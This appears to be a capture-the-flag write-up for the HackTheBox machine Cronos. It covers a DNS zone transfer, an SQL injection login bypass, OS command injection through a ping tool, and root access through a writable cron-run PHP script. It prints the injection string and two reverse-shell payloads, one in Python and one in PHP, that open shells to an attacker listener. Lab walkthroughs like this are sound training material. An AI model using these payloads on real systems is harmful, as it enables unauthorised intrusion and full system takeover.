Service Enumeration -H -t all

We can perform a DNS zone transfer, guessing that the domain is cronos.htb:

dig axfr @ cronos.htb

Here, we uncover some subdomains for Let's add them to our /etc/hosts file.

Now, going to www.cronos.htb and admin.cronos.htb yields a valid webpage.


The admin.cronos.htb login page is vulnerable to SQL injection. Using the payload:

username=' or 1=1;#&password=

We can bypass the authentication. Note that this does not work on the password field.

We get access to the following tool:

If we examine the POST request, we see that ping -c 1 is sent as the command parameter. It is possible that the server is not sanitizing the input and reflecting the command parameter into the OS command.

Indeed, changing to -c 2 changes the command executed!

We now have an RCE vulnerability. Executing the which python command shows that Python is installed on the server.

We can use a Python reverse shell payload:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",4242));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

After URL encoding, we can edit the command parameter:


On our Netcat listener, we receive the reverse shell

Privilege Escalation

We can use LinPEAS to enumerate.

We find the following cron job that runs every minute:

The script run is a PHP script:

We can change this to our custom PHP payload:

<?php $sock=fsockopen("",4242); $proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes); ?>

The next time the cron job is run, we obtain a root shell on our listener.

Last updated